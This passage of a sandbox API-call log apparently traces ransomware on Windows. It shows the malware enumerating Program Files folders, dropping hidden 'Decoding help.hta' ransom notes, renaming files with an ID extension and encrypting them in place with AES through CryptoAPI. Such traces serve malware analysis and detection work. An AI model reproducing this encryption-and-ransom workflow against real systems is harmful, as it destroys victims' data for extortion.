lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\MSMAPI\\1033\\MSMAPI32.DLL") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\MSMAPI\\1033\\MSMAPI32.DLL" [0057.618] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\MSMAPI\\1033\\MSMAPI32.DLL", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\MSMAPI\\1033\\MSMAPI32.DLL.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\MSMAPI\\1033\\MSMAPI32.DLL.[ID]g9uZrLhJaygpwRm1[ID]" [0057.618] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\MSMAPI\\1033\\MSMAPI32.DLL" (normalized: "c:\\program files\\common files\\system\\msmapi\\1033\\msmapi32.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\MSMAPI\\1033\\MSMAPI32.DLL.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\system\\msmapi\\1033\\msmapi32.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0057.619] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\MSMAPI\\1033\\MSMAPI32.DLL.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\system\\msmapi\\1033\\msmapi32.dll.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x9b8 [0057.619] CreateFileMappingA (hFile=0x9b8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x9bc [0057.619] CryptAcquireContextA (in: phProv=0x4b4fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x4b4fcec*=0x3448a50) returned 1 [0060.170] CryptGenKey (in: hProv=0x3448a50, Algid=0x6610, dwFlags=0x1, phKey=0x4b4fce8 | out: phKey=0x4b4fce8*=0x42cf098) returned 1 [0060.171] CryptExportKey (in: hKey=0x42cf098, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x4b4fbe4, pdwDataLen=0x4b4fce4 | out: pbData=0x4b4fbe4*, pdwDataLen=0x4b4fce4*=0x2c) returned 1 [0060.171] MapViewOfFile (hFileMappingObject=0x9bc, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xe580) returned 0x25b0000 [0063.799] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4b4fbe4*, pdwDataLen=0x4b4fcf8*=0x40, dwBufLen=0x100 | out: pbData=0x4b4fbe4*, pdwDataLen=0x4b4fcf8*=0x100) returned 1 [0063.800] CryptEncrypt (in: hKey=0x42cf098, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x25b0000, pdwDataLen=0x4b4fce4*=0xe580, dwBufLen=0xe580 | out: pbData=0x25b0000*, pdwDataLen=0x4b4fce4*=0xe580) returned 1 [0063.812] UnmapViewOfFile (lpBaseAddress=0x25b0000) Thread: id = 594 os_tid = 0xd8c [0048.716] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\en-US\\*.*", lpFindFileData=0x8a0fd30 | out: lpFindFileData=0x8a0fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eab37af, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x23ecb743, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a5730 [0053.665] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0053.665] FindNextFileW (in: hFindFile=0x5a5730, lpFindFileData=0x8a0fd30 | out: lpFindFileData=0x8a0fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eab37af, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x23ecb743, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0053.665] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0053.665] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0053.665] FindNextFileW (in: hFindFile=0x5a5730, lpFindFileData=0x8a0fd30 | out: lpFindFileData=0x8a0fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eab37af, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x23ecb743, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0053.665] FindClose (in: hFindFile=0x5a5730 | out: hFindFile=0x5a5730) returned 1 Thread: id = 595 os_tid = 0xd90 [0048.718] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\AppInfoDocument\\*.*", lpFindFileData=0x8b0fd30 | out: lpFindFileData=0x8b0fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x594863b0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xe5707cc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe5707cc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5e2ff0 [0049.800] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0049.800] FindNextFileW (in: hFindFile=0x5e2ff0, lpFindFileData=0x8b0fd30 | out: lpFindFileData=0x8b0fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x594863b0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xe5707cc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe5707cc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0049.801] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0049.801] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0049.801] FindNextFileW (in: hFindFile=0x5e2ff0, lpFindFileData=0x8b0fd30 | out: lpFindFileData=0x8b0fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xed5c9040, ftCreationTime.dwHighDateTime=0x1d305f1, ftLastAccessTime.dwLowDateTime=0xe5707cc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xed5c9040, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x25b9, dwReserved0=0x0, dwReserved1=0x0, cFileName="AddIns.store", cAlternateFileName="ADDINS~1.STO")) returned 1 [0050.120] lstrcpyW (in: lpString1=0x10c86800, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\AppInfoDocument\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\AppInfoDocument\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\AppInfoDocument\\*.*" [0050.120] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\AppInfoDocument\\*.*") returned 81 [0050.120] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\AppInfoDocument\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\AppInfoDocument\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\AppInfoDocument\\Decoding help.hta" [0050.120] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\AppInfoDocument\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\appinfodocument\\decoding help.hta")) returned 0xffffffff [0050.120] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\AppInfoDocument\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\appinfodocument\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x42c [0055.304] WriteFile (in: hFile=0x42c, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x8b0fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x8b0fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0056.439] CloseHandle (hObject=0x42c) returned 1 [0056.440] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\AppInfoDocument\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0056.733] lstrcmpiW (lpString1="Decoding help.hta", lpString2="AddIns.store") returned 1 [0056.733] lstrlenW (lpString="AddIns.store") returned 12 [0056.733] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\AppInfoDocument\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\AppInfoDocument\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\AppInfoDocument\\*.*" [0056.733] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\AppInfoDocument\\*.*") returned 81 [0056.733] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\AppInfoDocument\\", lpString2="AddIns.store" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\AppInfoDocument\\AddIns.store") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\AppInfoDocument\\AddIns.store" [0056.733] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\AppInfoDocument\\AddIns.store" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\AppInfoDocument\\AddIns.store") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\AppInfoDocument\\AddIns.store" [0056.733] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\AppInfoDocument\\AddIns.store", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\AppInfoDocument\\AddIns.store.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\AppInfoDocument\\AddIns.store.[ID]g9uZrLhJaygpwRm1[ID]" [0056.733] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\AppInfoDocument\\AddIns.store" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\appinfodocument\\addins.store"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\AppInfoDocument\\AddIns.store.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\appinfodocument\\addins.store.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0060.490] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\AppInfoDocument\\AddIns.store.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\appinfodocument\\addins.store.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a4 [0060.490] CreateFileMappingA (hFile=0x5a4, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x964 [0060.490] CryptAcquireContextA (in: phProv=0x8b0fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8b0fcec*=0x10e28460) returned 1 [0060.491] CryptGenKey (in: hProv=0x10e28460, Algid=0x6610, dwFlags=0x1, phKey=0x8b0fce8 | out: phKey=0x8b0fce8*=0x10bc5a90) returned 1 [0060.491] CryptExportKey (in: hKey=0x10bc5a90, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x8b0fbe4, pdwDataLen=0x8b0fce4 | out: pbData=0x8b0fbe4*, pdwDataLen=0x8b0fce4*=0x2c) returned 1 [0060.491] MapViewOfFile (hFileMappingObject=0x964, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x25a0) Thread: id = 596 os_tid = 0xd94 [0048.721] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\*.*", lpFindFileData=0x8dafd30 | out: lpFindFileData=0x8dafd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eab37af, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x23ef19fc, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5d8890 [0049.288] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0049.288] FindNextFileW (in: hFindFile=0x5d8890, lpFindFileData=0x8dafd30 | out: lpFindFileData=0x8dafd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eab37af, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x23ef19fc, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0049.288] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0049.288] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0049.288] FindNextFileW (in: hFindFile=0x5d8890, lpFindFileData=0x8dafd30 | out: lpFindFileData=0x8dafd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbb6d5cd, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0xbeb51b3, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xbb6d5cd, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1600, dwReserved0=0x0, dwReserved1=0x0, cFileName="msdasqlr.dll.mui", cAlternateFileName="")) returned 1 [0049.628] lstrcpyW (in: lpString1=0x671fd8, lpString2="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\*.*" [0049.628] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\*.*") returned 57 [0049.629] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\Decoding help.hta" [0049.629] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\Decoding help.hta" (normalized: "c:\\program files\\common files\\system\\ole db\\en-us\\decoding help.hta")) returned 0xffffffff [0049.629] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\Decoding help.hta" (normalized: "c:\\program files\\common files\\system\\ole db\\en-us\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x490 [0051.896] WriteFile (in: hFile=0x490, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x8dafcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x8dafcf8*=0x78e, lpOverlapped=0x0) returned 1 [0051.897] CloseHandle (hObject=0x490) returned 1 [0051.897] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0051.897] lstrcmpiW (lpString1="Decoding help.hta", lpString2="msdasqlr.dll.mui") returned -1 [0051.897] lstrlenW (lpString="msdasqlr.dll.mui") returned 16 [0051.898] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\*.*" [0051.898] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\*.*") returned 57 [0051.898] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\", lpString2="msdasqlr.dll.mui" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\msdasqlr.dll.mui") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\msdasqlr.dll.mui" [0051.898] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\msdasqlr.dll.mui" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\msdasqlr.dll.mui") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\msdasqlr.dll.mui" [0051.898] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\msdasqlr.dll.mui", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\msdasqlr.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\msdasqlr.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]" [0051.898] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\msdasqlr.dll.mui" (normalized: "c:\\program files\\common files\\system\\ole db\\en-us\\msdasqlr.dll.mui"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\msdasqlr.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\system\\ole db\\en-us\\msdasqlr.dll.mui.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0051.898] FindNextFileW (in: hFindFile=0x5d8890, lpFindFileData=0x8dafd30 | out: lpFindFileData=0x8dafd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8aabb7e, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x8e65f8f, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x8aabb7e, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xba00, dwReserved0=0x0, dwReserved1=0x0, cFileName="oledb32r.dll.mui", cAlternateFileName="")) returned 1 [0051.898] lstrcpyW (in: lpString1=0x671fd8, lpString2="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\*.*" [0051.898] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\*.*") returned 57 [0051.898] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\Decoding help.hta" [0051.898] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\Decoding help.hta" (normalized: "c:\\program files\\common files\\system\\ole db\\en-us\\decoding help.hta")) returned 0x1 [0051.898] lstrcmpiW (lpString1="Decoding help.hta", lpString2="oledb32r.dll.mui") returned -1 [0051.898] lstrlenW (lpString="oledb32r.dll.mui") returned 16 [0051.898] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\*.*" [0051.898] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\*.*") returned 57 [0051.898] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\", lpString2="oledb32r.dll.mui" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\oledb32r.dll.mui") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\oledb32r.dll.mui" [0051.898] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\oledb32r.dll.mui" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\oledb32r.dll.mui") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\oledb32r.dll.mui" [0051.898] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\oledb32r.dll.mui", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\oledb32r.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\oledb32r.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]" [0051.898] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\oledb32r.dll.mui" (normalized: "c:\\program files\\common files\\system\\ole db\\en-us\\oledb32r.dll.mui"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\oledb32r.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\system\\ole db\\en-us\\oledb32r.dll.mui.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0051.899] FindNextFileW (in: hFindFile=0x5d8890, lpFindFileData=0x8dafd30 | out: lpFindFileData=0x8dafd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbb93886, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0xbeb51b3, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xbb93886, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xac00, dwReserved0=0x0, dwReserved1=0x0, cFileName="sqloledb.rll.mui", cAlternateFileName="")) returned 1 [0051.899] lstrcpyW (in: lpString1=0x671fd8, lpString2="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\*.*" [0051.899] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\*.*") returned 57 [0051.899] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\Decoding help.hta" [0051.899] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\Decoding help.hta" (normalized: "c:\\program files\\common files\\system\\ole db\\en-us\\decoding help.hta")) returned 0x1 [0051.899] lstrcmpiW (lpString1="Decoding help.hta", lpString2="sqloledb.rll.mui") returned -1 [0051.899] lstrlenW (lpString="sqloledb.rll.mui") returned 16 [0051.899] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\*.*" [0051.899] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\*.*") returned 57 [0051.899] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\", lpString2="sqloledb.rll.mui" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\sqloledb.rll.mui") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\sqloledb.rll.mui" [0051.899] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\sqloledb.rll.mui" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\sqloledb.rll.mui") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\sqloledb.rll.mui" [0051.899] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\sqloledb.rll.mui", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\sqloledb.rll.mui.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\sqloledb.rll.mui.[ID]g9uZrLhJaygpwRm1[ID]" [0051.899] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\sqloledb.rll.mui" (normalized: "c:\\program files\\common files\\system\\ole db\\en-us\\sqloledb.rll.mui"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\sqloledb.rll.mui.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\system\\ole db\\en-us\\sqloledb.rll.mui.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0051.899] FindNextFileW (in: hFindFile=0x5d8890, lpFindFileData=0x8dafd30 | out: lpFindFileData=0x8dafd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ad1e37, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x8e65f8f, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, 